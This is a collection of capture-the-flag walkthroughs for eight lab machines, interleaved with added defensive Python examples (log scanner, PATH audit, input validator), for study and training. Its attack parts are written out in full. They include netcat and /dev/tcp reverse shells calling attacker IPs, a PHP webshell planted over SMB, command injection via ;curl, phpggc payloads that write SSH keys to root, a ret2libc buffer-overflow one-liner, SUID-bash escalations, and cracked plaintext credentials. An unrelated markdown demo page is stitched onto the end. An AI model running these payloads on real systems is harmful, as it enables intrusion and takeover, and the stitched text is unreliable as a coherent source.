FriendZone

1.nmap scan

the machine has ftp, ssh, smbd and ssl open; port 80 serves just a picture
SMB shares 445/139

first use smbmap to list shares and permissions

smbmap -H 10.10.10.123
the shares can also be listed with smbclient
smbclient -N -L //10.10.10.123

-N means a null session (no auth) and -L lists the shares

the comment on the Files share says it is /etc/Files
so we can use nmap to verify

nmap --script smb-enum-shares.nse -p445 10.10.10.123
it gives me the path on the target for each share
Development

The Development share is empty:

general

The general share has a single file; we can get it and have a look

it's a credential

TCP 80

the site gives us a new domain, friendzoneportal.red
we now use dirsearch to find some paths

robots.txt is just a phrase

and wordpress is an empty directory

https 443

first use the common name from the TLS certificate (seen in the nmap output) to visit https://friendzone.red:443/
the site just has a picture

and if we view the page source, we can get another path

the js/js path has an encoded string, so we can try to decode it

it also has a hint

for now I don't know what it means

TCP/UDP 53

TCP is only used in DNS when the response size is greater than 512 bytes. Typically this is associated with Zone Transfers, where the server gives all the information it has for a domain. There are a few things I could try to enumerate DNS, but the fact that the host is listening on TCP 53 suggests the first thing I should try is a Zone Transfer.
I’ll do that with dig. I’ll start with friendzone.htb, and get nothing:

Since I have a domain name in the TLS certificate, I’ll try that:

I can also try the domain I got on the first webpage, “friendzoneportal.red”:

I’ll update my hosts file for each of these:

administrator1.friendzone.red
use the creds we got to log in, and we can visit /dashboard.php. Adding `?image_id=a.jpg&pagename=timestamp` to the path gives us another page. Running dirsearch on this host finds an images directory with two pictures and a page called timestamp.php

2.get webshell access

Find LFI

because the picture is loaded by its full file name, we can look for local file inclusion
1.image_id
The image_id, such as a.jpg is a full file name. I’ll try giving it a php page, which it would load if that file is being shown using include in php. Unfortunately, it just shows a broken image:

Looking at the source, I see <img src='images/timestamp.php'>. I could play with XSS here, and see if I can get it to load a script. For example, if I set image_id=' onerror='javascript: alert("XXS HERE");, I get a pop-up:

The source explains it: <img src='images/' onerror='javascript: alert("XXS HERE");'>
2.pagename
Since the given example case is timestamp, and there’s a timestamp.php in the same directory, I can assume that this is likely doing an include($_GET["pagename"] . ".php"). I can test this by having it point to other php pages.
Visiting https://administrator1.friendzone.red/login.php returns: Wrong!
and changing pagename to login shows the same word

read PHP resource

I can use this LFI to read source code for these pages using php filters. If I visit pagename=php://filter/convert.base64-encode/resource=dashboard, I can see a long base64 string on the page:

decoding it, we find something

we can do the same thing to read upload with pagename=php://filter/convert.base64-encode/resource=../uploads/upload
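From the defender's side, the php://filter read and the traversal into /etc/Development above leave distinctive traces in the web server's access log. The following is an added example (not code from the box or from this writeup) that flags such requests; the log lines are constructed to mirror the requests described above, the parameter names image_id, pagename and cmd come from the page, and the combined log format is assumed.

```python
"""Flag LFI probes against dashboard.php in web-server access logs.

Added example for this writeup, not code from the box or the original author.
The log lines are constructed to mirror the requests described above; the
parameter names image_id, pagename and cmd come from the page, the log format
is assumed to be the common Apache/nginx combined format.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample log: two benign requests, the php://filter read, the
# traversal-to-webshell request and the onerror XSS probe.
SAMPLE_LOG = """\
10.10.16.10 - - [01/Jan/2019:10:00:00 +0000] "GET /dashboard.php?image_id=a.jpg&pagename=timestamp HTTP/1.1" 200 512
10.10.16.10 - - [01/Jan/2019:10:00:05 +0000] "GET /dashboard.php?image_id=a.jpg&pagename=login HTTP/1.1" 200 40
10.10.16.10 - - [01/Jan/2019:10:00:09 +0000] "GET /dashboard.php?image_id=a.jpg&pagename=php://filter/convert.base64-encode/resource=dashboard HTTP/1.1" 200 3000
10.10.16.10 - - [01/Jan/2019:10:00:14 +0000] "GET /dashboard.php?image_id=&pagename=../../../etc/Development/zyz&cmd=id HTTP/1.1" 200 90
10.10.16.10 - - [01/Jan/2019:10:00:20 +0000] "GET /dashboard.php?image_id=%27%20onerror%3D%27alert(1)&pagename=timestamp HTTP/1.1" 200 512
"""

# Combined log format: client, ident, user, [timestamp], "METHOD target PROTO", status
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Patterns showing the include() argument being steered away from the intended page
SUSPICIOUS = (
    ("php_wrapper", re.compile(r'^(php|data|expect|phar|zip)://', re.I)),
    ("traversal", re.compile(r'(^|[\\/])\.\.([\\/]|$)')),
    ("absolute_path", re.compile(r'^/(etc|proc|var|usr|tmp)/')),
)
# Parameters the page feeds into include() / the <img src>
INCLUDE_PARAMS = ("pagename", "image_id")


def classify_param(value):
    """Return the names of all suspicious patterns matching one parameter value.
    The value is decoded once more to catch double-encoded payloads."""
    decoded = unquote(value)
    return [name for name, rx in SUSPICIOUS if rx.search(decoded)]


def scan_log(text):
    """Parse access-log lines and return one finding per request that carries
    an LFI-style value in an include parameter or a cmd= webshell parameter."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than crash
        url = urlsplit(m["target"])
        params = parse_qs(url.query, keep_blank_values=True)  # parse_qs URL-decodes values
        reasons = []
        for p in INCLUDE_PARAMS:
            for value in params.get(p, []):
                reasons += [f"{p}:{r}" for r in classify_param(value)]
        if "cmd" in params:
            reasons.append("cmd:webshell-style parameter")
        if reasons:
            findings.append({"ip": m["ip"], "time": m["ts"], "path": url.path, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} {f['path']} -> {', '.join(f['reasons'])}")
```

Running it over the sample prints two findings: the php://filter request and the traversal request that also carries cmd=. The XSS probe on image_id is deliberately not matched, since that is a different class of issue; the pattern list is easy to extend for other wrappers or paths.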

webshell

I want to use this LFI to include a webshell so I can run commands. I’ll use my smb access to drop a simple php command shell into the Development share, which nmap told me was /etc/Development.

and upload it to the machine:

smbclient -N //10.10.10.123/Development -c 'put cmd.php zyz.php'
Now, on visiting `https://administrator1.friendzone.red/dashboard.php?image_id=&pagename=../../../etc/Development/zyz&cmd=id`, I get output:

I’ll use my go-to from the Reverse Shell Cheat Sheet and visit: https://administrator1.friendzone.red/dashboard.php?image_id=&pagename=../../../etc/Development/zyz&cmd=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>%261|nc 10.10.16.10 4444 >/tmp/f (remembering to encode the & as %26):

After a shell upgrade (python -c 'import pty;pty.spawn("bash")', ctrl-z, stty raw -echo;fg, reset, enter “screen” for terminal type if asked), I’ve got a full shell. And I can get user.txt.
In the /var/www/ directory, there are folders for all the different sites, as well as an sql conf file:

use the password to su to friend

3.get root access

searching around the machine, there is a python script in /opt/server_admin

/tmp is writable, so we upload our pspy there

our machine: python3 -m http.server 80
target machine: wget http://10.10.16.10/pspy32s
chmod +x pspy32s
./pspy32s

and we can see that root runs this script every two minutes:

via linpeas.sh we find a file that friend can write to

we append the following script to the end of it

and finally we get root

Delivery

1.nmap scan

and add helpdesk.delivery.htb to /etc/hosts:
echo "10.10.10.222 helpdesk.delivery.htb" >> /etc/hosts

2.website

port 80 shows nothing, but we can go to http://helpdesk.delivery.htb/index.php to get some information

it shows osTicket running on 80
and on port 8065 there is another login page

i first add a user in mattermost and try to find an exploit
it needs me to verify the account
so let's use searchsploit osticket and try to exploit that
every registration needs verification
as a guest, we can open a new ticket and see its feedback

3.getting webshell access

because the machine cannot access the internet, the verification step can't be completed the normal way
but when I created a ticket, it offered the ability to update the ticket over email. I can use that to get the verification email.

I’ll create a ticket and get the email address for it. Then sign up for a MatterMost account:


the default email is 2200493@delivery.htb
register a new account using 2200493@delivery.htb

check the ticket using ticket number 2200493

and now we get the verification mail

open the verification link and we can get in

in the website we can see a credential: maildeliverer:Youve_G0t_Mail!
and it shows a hint that passwords may be PleaseSubscribe!

then I can try the creds I just got to ssh into the machine

4.getting root access

Mattermost stores its configuration in /opt/mattermost/config/config.json. The database connection information is in here:

username:mmuser
password:Crack_The_MM_Admin_PW
database:mattermost

we can get usernames and password hashes from the Users table

select Username,Password from Users;
crack the root password

we can save the hash to a file and the hint PleaseSubscribe! to another file

and the result is PleaseSubscribe!21

finally, we get root

Horizontall

1.nmap scan

first we add the host to /etc/hosts:

echo "10.10.11.105 horizontall.htb" >> /etc/hosts

2.getting web access

the website doesn't have any buttons linking to other pages
the page has two js files, and we can read them to find something

The JavaScript in app.c68eb462.js is minified, but tossing it into a jsFormatter returns 654 lines of JavaScript. Glancing through it, this section jumped out because it reveals a subdomain:

after this, I also used dirsearch and fuzzing against the website, but found nothing useful
so we first add api-prod.horizontall.htb to /etc/hosts:

echo "10.10.11.105 api-prod.horizontall.htb" >> /etc/hosts

visit the page and run dirsearch on the site; we can see some admin pages and a /reviews page

the reviews page returns a JSON string

from the admin page we know it is built with strapi
we can use searchsploit to search and msfconsole to run an exploit

we can read the poc and learn how to find the version


the version matches the exploit, so we can try to change the password

we can use this command to get a reverse shell:

bash -c 'bash -i >& /dev/tcp/10.10.14.15/8888 0>&1'
and this command to get an interactive shell:
python3 -c 'import pty;pty.spawn("/bin/bash")'

in /home/developer we don't have permission

3.getting root access

the existence of a composer-setup.php file suggests there’s some kind of PHP site in use here.
Looking at the netstat, there’s the site on 80, and a NodeJS side on 1337. There’s also MySQL on 3306 (which makes sense). But there’s also something on 8000:

The service on 8000 is an HTTP server:

And based on the response and the cookies, it looks like Laravel, a PHP framework.

page access

Although the strapi user’s home directory is /opt/strapi, I can still add a .ssh directory and an authorized_keys file. I’ll add my key:


now we get a default page running on localhost:8000

use dirsearch and we can find /profiles

Not only does it crash, it also returns a bunch of information. This is Laravel debug mode.

exploit 1

Laravel <= v8.4.2 has a remote code execution vulnerability in Debug Mode
we can get a poc from its repo

Reviewing the code we see where the id command is being executed:

we can set the SUID bit on bash for a quick privilege escalation to root, as shown in rce2:

we can confirm the SUID bit is set with ls -l /bin/bash

exploit 2

To show it works, I’ll start with the id command. First, I’ll generate the payload using phpggc:

php -d'phar.readonly=0' /opt/phpggc/phpggc --phar phar -o id.phar --fast-destruct monolog/rce1 system id

This creates a serialized PHP file, which I saved as id.phar. The file looks like a PHP object:

the command, id, is on the line at offset 0x000000f0.
Now I’ll run the Python script, passing it the serialized payload:

python3 /opt/laravel-exploits/laravel-ignition-rce.py http://127.0.0.1:8000 id.phar 

to get a shell, we can regenerate a new payload, this time creating /root/.ssh if it doesn’t exist, and then writing my SSH key to authorized_keys:

php -d'phar.readonly=0' /opt/phpggc/phpggc --phar phar -o ssh.phar --fast-destruct monolog/rce1 system 'mkdir -p /root/.ssh; echo "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDIK/xSi58QvP1UqH+nBwpD1WQ7IaxiVdTpsg5U19G3d nobody@nothing" >> /root/.ssh/authorized_keys'

Run the exploit again, and we also get root access.

Previse

1.nmap scan

2.website

it just has a login page
let’s use dirsearch to find some directories
we can see some pages redirect to login.php

we use burpsuite to catch the response, and we can see a register page that only admin can use

we can use burpsuite to manually change the status code to 200 OK to view accounts.php

and thus we get access to accounts.php

now we can add a user to test it
if we don’t want to do this for each page action, we can have Burp do it for us while we browse the site. Go to Proxy > Options > Match and Replace > Add and set the following options:

Type: Response header
Match: 302 Found
Replace: 200 OK
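The reason the status-code trick above works is a server-side bug: the page sends a redirect for unauthenticated users but keeps rendering the protected body after it. The following is an added Python model of that pattern and of its fix, not the box's PHP; the page content, session shape and function names are constructed for illustration.

```python
"""Why rewriting "302 Found" to "200 OK" exposed accounts.php.

Added example for this writeup, not the box's code. It models the server-side
pattern the behaviour above implies: the handler sends a redirect for
unauthenticated users but does not stop, so the protected page body is still
generated and sent along with the 302. Page content and session shape are
constructed.
"""

ACCOUNTS_BODY = "<form action='accounts.php'>username / password / confirm</form>"  # constructed


def accounts_page_vulnerable(session):
    """Redirect-without-return: the body below is rendered for everyone."""
    status, headers = 200, {}
    if not session.get("user"):
        status, headers = 302, {"Location": "login.php"}
        # BUG: no early return here (the PHP equivalent is header() without exit)
    body = ACCOUNTS_BODY  # executed whether or not the user is logged in
    return status, headers, body


def accounts_page_fixed(session):
    """Return immediately after deciding to redirect; nothing sensitive is rendered."""
    if not session.get("user"):
        return 302, {"Location": "login.php"}, ""
    return 200, {}, ACCOUNTS_BODY


def proxy_rewrite_status(response):
    """What the Burp match-and-replace rule above does: rewrite the status line
    of every 302 response to 200 so the browser renders the body instead of
    following the redirect. Headers and body pass through untouched."""
    status, headers, body = response
    return (200 if status == 302 else status), headers, body


def leaks_protected_content(handler):
    """True if an anonymous request, after the proxy rewrite, yields the protected body."""
    status, _headers, body = proxy_rewrite_status(handler({}))
    return status == 200 and body == ACCOUNTS_BODY


if __name__ == "__main__":
    for name, handler in (("vulnerable", accounts_page_vulnerable), ("fixed", accounts_page_fixed)):
        print(f"{name}: leaks protected content = {leaks_protected_content(handler)}")
```

The client-side rewrite only helps because the server already sent the body; once the handler returns right after setting the redirect, the proxied 200 carries an empty page and the auth check holds.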

now we can download sitebackup.zip and unzip it
in logs.php, we can see a function that uses exec, and we just need to POST a $delim

we can change the request method and add a delim to get a response

We can test for Command Injection by adding a ;curl+http://10.10.14.15/ after the POST request:

so we can try to get a reverse shell to our machine:

;bash -c 'bash -i >& /dev/tcp/10.10.14.15/8888 0>&1' <- this needs to be URL-encoded
nc -lvnp 8888

we still can't get the user flag yet
Next we can upgrade our shell to a more interactive one:

python3 -c 'import pty;pty.spawn("/bin/bash")' then press Ctrl+Z
stty raw -echo;fg then press ENTER twice
export TERM=xterm

we can get the mysql username and password from config.php

username:root
password:mySQL_p@ssw0rd!:)
db:previse
and now we can get into the database

and in the previse database we find two tables

we can use m4lwhere to ssh in, but first we need to crack the password
copy the hash and use hashcat to crack it with the command:
hashcat -m 500 hash.txt /usr/share/wordlists/rockyou.txt

username:m4lwhere
password:ilovecody112235!
and now we can try to ssh in:

ssh m4lwhere@10.10.11.104

and we get in

finally, we get the user flag

3. getting access to root

first, we use sudo -l to find commands that don't need the root password

Reading over the script, we see that both the gzip and the date command don’t have the full PATH set to them:

the PATH in Linux is how the system looks for the binary that we are trying to execute:

In this case, it is going to look in /usr/local/sbin then if it is not there, it looks at /usr/local/bin and so on until it is found.
We can manipulate this by changing the PATH: we can make the first entry in the PATH our current directory with the command export PATH=.:$PATH

And you can see that when I look for the cat command, where our custom one is, it points to the current directory.
So we can do the same thing with gzip or date back in the victim’s machine. First let’s create our own malicious gzip command:

cp /bin/bash /tmp/bash && chmod u+s /tmp/bash

This will create a SUID bash command that we can use for easy root access. Next we can change the PATH so that it points to our current directory:

and now execute backup.sh

and finally we execute /tmp/bash -p and get root
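The root cause above is a privileged script that calls gzip and date by bare name, so whatever PATH the caller controls decides which binary runs. The following is an added Python audit (not the box's backup.sh and not the original author's code) that models the PATH lookup described above over a constructed in-memory filesystem and reports every bare command that would resolve from a relative or user-writable directory; it also shows the hardened form of the script, with PATH pinned and absolute paths, auditing clean. The sample scripts, directory contents and writable-directory list are all constructed assumptions.

```python
"""Audit a shell script for commands that resolve through PATH.

Added example for this writeup, not the box's backup.sh. It models the lookup
described above (the first PATH directory containing the name wins) over a
constructed in-memory view of the filesystem, so it runs offline. The sample
scripts, directory contents and the set of writable directories are all
constructed assumptions.
"""
import re

# Constructed stand-in for backup.sh: gzip and date are called by bare name.
BACKUP_SH = """#!/bin/bash
# constructed sample, not the real script
DATE=$(date +%Y-%m-%d)
/usr/bin/tar -cf /var/backup/site-$DATE.tar /var/www/html
gzip /var/backup/site-$DATE.tar
"""

# Hardened form: pin PATH and call every external program by absolute path.
HARDENED_SH = """#!/bin/bash
PATH=/usr/bin:/bin
export PATH
DATE=$(/bin/date +%Y-%m-%d)
/usr/bin/tar -cf /var/backup/site-$DATE.tar /var/www/html
/bin/gzip /var/backup/site-$DATE.tar
"""

SAFE_PATH = "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"

# Constructed view of which executables live in which directory.
FS = {
    "/usr/bin": {"gzip", "date", "tar"},
    "/bin": {"bash", "gzip", "date"},
    ".": set(),  # becomes attacker-controlled once PATH starts with "."
}
# Directories an unprivileged user can write to (constructed list).
WRITABLE = {".", "/tmp", "/var/tmp"}
# Shell builtins never resolve through PATH.
BUILTINS = {"export", "set", "cd", "exit", "umask", "unset", "source"}

# First word of a line, of a $( ... ) substitution, or after | ; &&
CMD_RE = re.compile(r'(?:^|\$\(|\||;|&&)\s*([^\s;|&()$]+)')


def bare_commands(script):
    """Names invoked without a slash (and so looked up through PATH), in order."""
    found = []
    for line in script.splitlines():
        if line.lstrip().startswith("#"):
            continue
        for tok in CMD_RE.findall(line):
            if "=" in tok or "/" in tok or tok in BUILTINS:
                continue  # assignment, explicit path, or builtin
            found.append(tok)
    return found


def resolve(cmd, path, fs=FS):
    """Directory a bare name resolves from under the given PATH, or None."""
    for d in path.split(":"):
        if cmd in fs.get(d, set()):
            return d
    return None


def audit(script, path, fs=FS):
    """(command, resolved_dir, risky) for every bare command; risky means the
    winning directory is relative or writable by unprivileged users."""
    findings = []
    for cmd in bare_commands(script):
        d = resolve(cmd, path, fs)
        risky = d is not None and (not d.startswith("/") or d in WRITABLE)
        findings.append((cmd, d, risky))
    return findings


if __name__ == "__main__":
    planted = {**FS, ".": {"gzip"}}  # a fake gzip dropped in the current directory
    for row in audit(BACKUP_SH, ".:" + SAFE_PATH, planted):
        print(row)
```

Under the default PATH both bare commands resolve from /usr/bin and are reported safe; once "." is prepended and a file named gzip exists there, the audit flags gzip as risky, which is exactly the condition the escalation above depends on. The hardened script yields no bare commands at all.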

Armageddon

1.nmap scan

2.web

from the burpsuite response we can tell it is built with drupal 7

with searchsploit, we can see some exploits

we can use msfconsole to exploit it

search drupal 7
use 1
set rhosts 10.10.10.233
set lhost 10.10.14.15

and we can get the shell

it denies us cd /home
so we cd to sites/default, and in settings.php we can get the database’s username and password

username:drupaluser
password:CQHEy@9M*m23gBVj

we can try these to log in to mysql
but in /etc/passwd we didn’t see drupaluser, therefore we probably need to get password hashes from the database itself:

Using the credentials drupaluser:CQHEy@9M*m23gBVj, we can get the databases users and hashes.

mysql -u drupaluser -p"CQHEy@9M*m23gBVj" -e "use drupal; select name,pass from users;"
Using the RockYou wordlist we can crack the password hash for the brucetherealadmin user.
john -w=/usr/share/wordlists/rockyou.txt hash.txt

username:brucetherealadmin
password:booboo
And we have brucetherealadmin’s password! Now let’s try to login via SSH:

3.getting root access

when we run sudo -l, it looks like we are able to run snap as the root user without any password, therefore let’s use the GTFOBins entry for snap:

first we install fpm and do the next steps

gem install fpm
Now we upload the malicious privesc snap file to the machine, and run snap as the root user to install the snap package we created:

Frolic

1.nmap scan

port exploration

9999: at 10.10.10.111:9999 there’s a simple nginx welcome page
445: smb is running on 445; we can use the common methods to find if there is anything usable

smbmap -H 10.10.10.111

smbmap shows nothing we can use

smbclient -N -L //10.10.10.111

and smbclient also shows nothing interesting

1880: the site on port 9999 gives us a url: http://forlic.htb:1880
it’s an admin web page

dirsearch

we run dirsearch against all the ports we found, and on 9999 there are some pages:

10.10.10.111:9999/test has a phpinfo page
10.10.10.111:9999/backup has something useful
10.10.10.111:9999/dev is forbidden
10.10.10.111:9999/admin is an admin page

we can use curl 10.10.10.111:9999/backup/user.txt and curl 10.10.10.111:9999/backup/password.txt to get admin and imnothuman

dirsearch deeper

though /dev is forbidden, we run dirsearch against http://10.10.10.111:9999/dev to explore deeper
it has backup and test

in /backup, it shows /playsms
in /test, it provides a file named test
10.10.10.111:9999/playsms is another login page

/admin

the /admin page loads a js file that hides the login information

the username is admin and the password is superduperlooperpassword_lol
after entering it, we see some brainfuck code, which we decode at:

https://www.dcode.fr/ook-language

it shows Nothing here check /asdiSIAJJ0QWE9JAS
after visiting it, it displays a new encoded page; after decoding, we get some message

decoding it, it looks like a zip: curl -s http://10.10.10.111:9999/asdiSIAJJ0QWE9JAS/ | base64 -d | xxd

curl -s http://10.10.10.111:9999/asdiSIAJJ0QWE9JAS/ | base64 -d > index.php.zip
when we unzip it, it asks for a password
use fcrackzip to crack it:
fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt out.zip
The options are -u to force actual unzip, which weeds out tons of false positives, -D for dictionary, and -p rockyou.txt to pass the wordlist. The password is password

Use xxd to read that back to bytes, which happen to be not only ASCII, but base64 characters: cat index.php | xxd -r -p

decode it, and get the text:
cat index.php | xxd -r -p | tr -d '\r\n' | base64 -d

it’s brainfuck; decode at https://copy.sh/brainfuck/ and get the phrase idkwhatispass

2.shell as web

now we have two passwords

1.admin/superduperlooperpassword_lol 2.admin/idkwhatispass
try them at /admin and /playsms; finally password 2 worked on /playsms

use msfconsole
msfconsole
search playsms
use 1
set rhost 10.10.10.111
set rport 9999
set targeturi /playsms/index.php
set lhost 10.10.14.15

then we get a webshell

3.shell as root

first improve the shell:

python3 -c 'import pty;pty.spawn("/bin/bash")'
we can see some hidden directories in ayush's home. .binary contains rop, which has the SUID bit set and is owned by root. rop's function is to take our input and print it back. we can first check what's configured:
cat /proc/sys/kernel/randomize_va_space

it shows ASLR is disabled
because we can’t read the binary directly when we open it, we use base64 to read it
and save it to the local machine, then use base64 -d rop_b64 > rop to restore it

open it in gdb with PEDA, and run checksec

we can force the program to crash

background

I can cause the program to crash by sending too much input which likely means I can overwrite the return address somewhere. Given that ASLR is disabled but DEP (NX) is enabled, the easiest attack path is to use Return to libc.

understand return to libc
1.stack

The stack starts at high memory addresses, and builds up to lower memory addresses. Inside any given function, there’s a stack frame. The bottom of the stack frame is stored in the RBP (or EBP on x86) register. The top is stored in RSP (or ESP). For example (and I’ll use 32-bit registers in this example since Frolic is 32-bit):

2.function call

When a function is called, the arguments are put onto the stack (either by adding space to the top or using the space already there). So, for example, the program comes to:

Just before the call, two addresses are stored in ESP and ESP+4. These are the addresses of the string to copy and the buffer to copy it to:

Now the call instruction is reached. It is going to push the next instruction to the top of the stack (as the return address), and then jump execution to the new function. The next function is going to start with some common stuff, known as the prologue:

So take that step by step. call pushes return address:

Now push ebp:

mov ebp, esp:

Finally sub esp, 0x100:

3. stack return

When a function is done, it will typically end with:

leave
ret

leave == mov esp, ebp + pop ebp
So the stack from before becomes:

Then when the return happens, the instruction pointer is popped, bringing that stack back to where it started:

4.What Is Return to libc

A return to libc attack involves overwriting the return address in such a way that the computer jumps to the function I want. The standard case is the system function, with the argument /bin/sh, giving me a shell.

If I were to call system(“/bin/sh”) normally, I would enter the function after the call but before the prologue with a stack like this:

The return address would be pushed onto the stack by the call instruction. But I’m not going to be going to system via a call, but rather a ret. So, I want the stack to look like this when I reach the return:

That way, ret will pop the system address into the instruction pointer, and the stack will look right. Since I don’t know the right return address, I’ll just use the function exit, so it cleanly exits when I’m done.

Find the Offset to EIP

open the file with gdb-peda. When the program crashes, I can take EIP and find out where that was in the pattern using pattern offset. I can use the ASCII or hex value:

To double check that, I’ll send in a buffer of 52 As and then 4 Bs:

Crash, with EIP as BBBB.

Addresses

Now I just need the addresses of system, exit, and /bin/sh in libc. This will vary on different hosts, so I’ll get the info with my shell on Frolic. First, I’ll get the base libc address with ldd.
Next, I’ll use readelf -s to get the offsets to various functions, and grep out system and exit.
Now I’ll use strings -a -t x to get the strings from libc with hex offsets, and grep for “/bin/sh”:

Now I can calculate the address for each of the three using any calculator (gdb here):

exploit

I can put that all together into this template: "A" * 52 + SYSTEM + EXIT + /bin/sh. I could write a python script to do this, but this case is simple enough that I can just do it as a one-liner. When I run that on Frolic, I’m root:
./rop $(python -c 'print("a"*52 + "\xa0\x3d\xe5\xb7" + "\xd0\x79\xe4\xb7" + "\x0b\x4a\xf7\xb7")')
now we finally get the flag

ScriptKiddie

1.nmap scan

nmap -sCV --min-rate=10000 -p- 10.10.10.226

2.site

the website has three parts
the first is an nmap module: when we type an ip, it sends back the nmap result
the payload section allows me to generate a payload after choosing ip, os and template file
the third part looks like a searchsploit module

foothold

when we search msfvenom, we can see it has an exploit for versions before 6.0.11

we can give it a try
msfvenom handles an APK template file. The idea of the template file is that you can pass msfvenom a legit .exe or .apk, and it will try to build a malicious file into that file while preserving the intended capability. This functionality allows for attackers to hide behind the legit functionality.

build payload

we can use searchsploit -m 49491.py to get this exploit
change the payload to bash -c 'bash -i >&/dev/tcp/10.10.14.15/8888 0>&1' to get a reverse shell
if the execution goes wrong, first use apt-get install openjdk-11-jdk-headless to provide jarsigner
or we can use msfconsole to generate an apk; we should change the payload to cmd/unix/reverse_netcat

use msfconsole
search msfvenom
use 0
set payload cmd/unix/reverse
set lhost xxxx
run

get webshell

and we can upload the apk to the website
in the website's “payloads” section, select Android for OS and upload the APK file generated by Metasploit

in the /home folder, we can find two users called kid and pwn

in pwn’s folder, we find a script called scanlosers.sh

the script’s function is to scan the ips written in /home/kid/logs/hackers
but this script doesn’t sanitize the input that the hackers file provides
so we can append a reverse shell command to the file:
echo "test ;/bin/bash -c 'bash -i >&/dev/tcp/10.10.14.15/8888 0>&1' #"
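The flaw above is a privileged script that pastes a field from a writable log into a shell command. The following is an added example (not the box's scanlosers.sh and not the original author's code) of how that script should consume the file: each line is validated as an IP address before use, and the scanner is invoked with an argv list and no shell, so the appended line is rejected instead of executed. The per-line format, the scanner options and the function names are assumptions for illustration.

```python
"""Safe handling of the hackers log that scanlosers.sh reads.

Added example for this writeup, not the box's script. It assumes, as the text
above describes, that each line of /home/kid/logs/hackers carries some text
followed by an IP address that a scanner is then run against. The rejected
line below is the one appended in the writeup; the other lines are constructed.
"""
import ipaddress
import subprocess

HACKERS_LOG = """\
nmap 10.10.14.15
scan 192.168.1.23
test ;/bin/bash -c 'bash -i >&/dev/tcp/10.10.14.15/8888 0>&1' #
probe 10.10.14.999
"""


def parse_hackers_log(text):
    """Split the log into (accepted_ips, rejected) where rejected holds
    (line_number, raw_line, reason). Only a line with exactly two fields whose
    second field parses as an IP address is accepted; nothing else is ever
    interpolated into a command."""
    ips, rejected = [], []
    for lineno, raw in enumerate(text.splitlines(), 1):
        fields = raw.split()
        if len(fields) != 2:
            rejected.append((lineno, raw, "unexpected field count"))
            continue
        try:
            ip = ipaddress.ip_address(fields[1])  # raises on anything that is not an address
        except ValueError:
            rejected.append((lineno, raw, "not an IP address"))
            continue
        ips.append(str(ip))
    return ips, rejected


def scan_command(ip):
    """Build the scanner invocation as an argv list. The original script's exact
    nmap options are not on the page; these are assumed."""
    return ["nmap", "--top-ports", "10", "-oN", f"/tmp/scan_{ip}.txt", ip]


def run_scans(text, runner=None):
    """Validate every line, then run one scan per accepted IP through `runner`.
    The default runner uses subprocess with an argv list and shell=False, so a
    shell never parses the line and metacharacters in it are inert."""
    if runner is None:
        runner = lambda argv: subprocess.run(argv, check=False)
    ips, rejected = parse_hackers_log(text)
    for ip in ips:
        runner(scan_command(ip))
    return ips, rejected


if __name__ == "__main__":
    accepted, bad = run_scans(HACKERS_LOG, runner=lambda argv: print("would run:", argv))
    for lineno, raw, why in bad:
        print(f"line {lineno} rejected ({why}): {raw}")
```

With the dry-run runner the two well-formed lines produce scan invocations, the injected line is rejected for having the wrong number of fields, and the out-of-range address is rejected by ipaddress; in the original script both of the rejected lines would have reached a shell.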

3.shell as root

as pwn, we can run sudo msfconsole without a password

and we get root

we can exec commands in msf or use /bin/bash -i to switch to a root shell

Nibbles

1.nmap scan

nmap -sCV --min-rate=10000 -p- 10.10.10.75

2.site

web

the website just says hello world, but the source code hides a hint:
<!-- /nibbleblog/ directory. Nothing interesting here! -->
visit it

dirsearch

we use dirsearch to enumerate and find some pages we can visit

when we visit some of them, we get directory listings
In exploring the resulting paths, /nibbleblog/content is interesting, and has directory listing enabled. Digging deeper, there’s a page at /nibbleblog/content/private/user.xml which reveals a user, admin, as well as the IPs that have tried to log in as it.

logging into admin

visit http://10.10.10.75/nibbleblog/admin.php
we don’t have the creds; most writeups say they guessed the password or used the information from http://10.10.10.75/nibbleblog/content/private/config.xml: admin / nibbles

Exploitation

on the settings page, we learn that the site is nibbleblog 4.0.3
we can use searchsploit to find some pocs
it has a file upload exploit
we use msf to get a webshell

after this, we can get user.txt

3.getting root

first get a fully interactive shell using the python pty.spawn one-liner:
python3 -c 'import pty;pty.spawn("/bin/bash")'
so we try running monitor.sh, and the color of the text changes

sudo trick
from this article, we learn how to use sudo-enabled files to open system-level tools like /bin/bash.
If you have write and execute permissions to a file that runs with elevated privileges, you can add commands such as system calls to get what you want.
we can use the following commands to get root:

echo "#! /bin/bash" > monitor.sh
echo "/bin/bash -i" >> monitor.sh
sudo ./monitor.sh

first_blog

h1 heading

h2 heading

h3 heading

h4 heading

h5 heading
h6 heading

Horizontal rule




Text styles

This is bold text

This is bold text

This is italic text

This is italic text

Strikethrough

Lists

Unordered

  • Create a list by starting a line with +, -, or *
  • Sub-lists are made by indenting 2 spaces:
    • Marker character change forces new list start:
      • Ac tristique libero volutpat at
      • Facilisis in pretium nisl aliquet
      • Nulla volutpat aliquam velit
  • Very easy!

Ordered

  1. Lorem ipsum dolor sit amet

  2. Consectetur adipiscing elit

  3. Integer molestie lorem at massa

  4. You can use sequential numbers…

  5. …or keep all the numbers as 1.

Start numbering with offset:

  1. foo
  2. bar

Code

Inline code

Indented code

// Some comments
line 1 of code
line 2 of code
line 3 of code

Block code “fences”

Sample text here...

Syntax highlighting

var foo = function (bar) {
return bar++;
};

console.log(foo(5));

creds